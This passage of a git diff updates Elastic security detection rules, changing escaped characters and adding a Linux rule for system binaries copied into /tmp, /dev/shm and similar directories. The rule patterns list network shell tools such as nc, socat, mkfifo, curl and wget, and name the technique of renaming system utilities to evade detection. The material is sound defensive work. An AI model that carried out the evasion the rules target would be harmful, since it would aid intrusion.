the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type:windows and event.category:process and event.type:start and process.parent.name:\"svchost.exe\" and \nprocess.name.caseless:\"cmd.exe\"\n", "references": [ "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fd9484f2-1c56-44ae-8b28-dc1354e3a0e8_1.json b/packages/security_detection_engine/kibana/security_rule/fd9484f2-1c56-44ae-8b28-dc1354e3a0e8_1.json index 30296f71b54..10b0206006e 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd9484f2-1c56-44ae-8b28-dc1354e3a0e8_1.json +++ b/packages/security_detection_engine/kibana/security_rule/fd9484f2-1c56-44ae-8b28-dc1354e3a0e8_1.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Image Loaded with Invalid Signature", - "query": "library where host.os.type == \"windows\" and event.action == \"load\" and\n dll.code_signature.status : (\"errorUntrustedRoot\", \"errorBadDigest\", \"errorUntrustedRoot\") and\n (dll.Ext.relative_file_creation_time \u003c= 500 or dll.Ext.relative_file_name_modify_time \u003c= 500) and\n not startswith~(dll.name, process.name) and\n not dll.path : (\n \"?:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\"\n )\n", + "query": "library where host.os.type == \"windows\" and event.action == \"load\" and\n dll.code_signature.status : (\"errorUntrustedRoot\", \"errorBadDigest\", \"errorUntrustedRoot\") and\n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and\n not startswith~(dll.name, process.name) and\n not dll.path : (\n \"?:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\"\n )\n", "related_integrations": [ { "package": "endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_1.json b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_1.json index e620d53f3bf..bb3ad8f9506 100644 --- a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_1.json +++ b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_1.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_2.json b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_2.json index b497cb68435..2dd34892153 100644 --- a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_2.json +++ b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_2.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_3.json b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_3.json index c1820a89e24..d989d0e62f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_3.json +++ b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_3.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_4.json b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_4.json new file mode 100644 index 00000000000..b08948c850d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_4.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the copying or moving of a system binary to a suspicious directory. Adversaries may copy/move and rename system binaries to evade detection. Copying a system binary to a different location should not occur often, so if it does, the activity should be investigated.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "System Binary Copied and/or Moved to Suspicious Directory", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.name in (\"cp\", \"mv\") and process.args : (\n // Shells\n \"/bin/*sh\", \"/usr/bin/*sh\", \n\n // Interpreters\n \"/bin/python*\", \"/usr/bin/python*\", \"/bin/php*\", \"/usr/bin/php*\", \"/bin/ruby*\", \"/usr/bin/ruby*\", \"/bin/perl*\",\n \"/usr/bin/perl*\", \"/bin/lua*\", \"/usr/bin/lua*\", \"/bin/java*\", \"/usr/bin/java*\", \n\n // Compilers\n \"/bin/gcc*\", \"/usr/bin/gcc*\", \"/bin/g++*\", \"/usr/bin/g++*\", \"/bin/cc\", \"/usr/bin/cc\",\n\n // Suspicious utilities\n \"/bin/nc\", \"/usr/bin/nc\", \"/bin/ncat\", \"/usr/bin/ncat\", \"/bin/netcat\", \"/usr/bin/netcat\", \"/bin/nc.openbsd\",\n \"/usr/bin/nc.openbsd\", \"/bin/*awk\", \"/usr/bin/*awk\", \"/bin/socat\", \"/usr/bin/socat\", \"/bin/openssl\",\n \"/usr/bin/openssl\", \"/bin/telnet\", \"/usr/bin/telnet\", \"/bin/mkfifo\", \"/usr/bin/mkfifo\", \"/bin/mknod\",\n \"/usr/bin/mknod\", \"/bin/ping*\", \"/usr/bin/ping*\", \"/bin/nmap\", \"/usr/bin/nmap\",\n\n // System utilities\n \"/bin/ls\", \"/usr/bin/ls\", \"/bin/cat\", \"/usr/bin/cat\", \"/bin/sudo\", \"/usr/bin/sudo\", \"/bin/curl\", \"/usr/bin/curl\",\n \"/bin/wget\", \"/usr/bin/wget\", \"/bin/tmux\", \"/usr/bin/tmux\", \"/bin/screen\", \"/usr/bin/screen\", \"/bin/ssh\",\n \"/usr/bin/ssh\", \"/bin/ftp\", \"/usr/bin/ftp\"\n ) and not process.parent.name in (\"dracut-install\", \"apticron\", \"generate-from-dir\", \"platform-python\")]\n [file where host.os.type == \"linux\" and event.action == \"creation\" and file.path : (\n \"/dev/shm/*\", \"/run/shm/*\", \"/tmp/*\", \"/var/tmp/*\", \"/run/*\", \"/var/run/*\", \"/var/www/*\", \"/proc/*/fd/*\"\n ) and not file.path : \"/tmp/rear*\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fda1d332-5e08-4f27-8a9b-8c802e3292a6", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 4 + }, + "id": "fda1d332-5e08-4f27-8a9b-8c802e3292a6_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_1.json b/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_1.json index 342d79a420d..5ba02ec8085 100644 --- a/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_1.json +++ b/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_1.json @@ -42,7 +42,7 @@ ], "risk_score": 47, "rule_id": "fddff193-48a3-484d-8d35-90bb3d323a56", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_2.json b/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_2.json index a0926b2bf87..8cb52ff0620 100644 --- a/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_2.json +++ b/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_2.json @@ -41,7 +41,7 @@ ], "risk_score": 47, "rule_id": "fddff193-48a3-484d-8d35-90bb3d323a56", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -72,7 +72,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_1.json b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_1.json index 3beb295c861..79ea57d994c 100644 --- a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_1.json +++ b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_1.json @@ -46,7 +46,7 @@ ], "risk_score": 21, "rule_id": "fe25d5bc-01fa-494a-95ff-535c29cc4c96", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_2.json b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_2.json index 22cfe714f61..aa94672fa57 100644 --- a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_2.json +++ b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_2.json @@ -46,7 +46,7 @@ ], "risk_score": 21, "rule_id": "fe25d5bc-01fa-494a-95ff-535c29cc4c96", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_3.json b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_3.json index c10bae75bc8..df9c0210e11 100644 --- a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_3.json +++ b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_3.json @@ -45,7 +45,7 @@ ], "risk_score": 21, "rule_id": "fe25d5bc-01fa-494a-95ff-535c29cc4c96", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_104.json b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_104.json index 352ee20851c..19edb4c0aca 100644 --- a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_104.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_105.json b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_105.json index d4352b90964..54cf9bd2d4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_105.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_106.json b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_106.json index c7efacaa31e..0b9e7ca314d 100644 --- a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_106.json +++ b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_106.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_107.json b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_107.json index 993bfce18ff..323aae3910a 100644 --- a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_107.json +++ b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_107.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_108.json b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_108.json index 2bcaa1b1660..d9de0602582 100644 --- a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_108.json +++ b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_108.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": 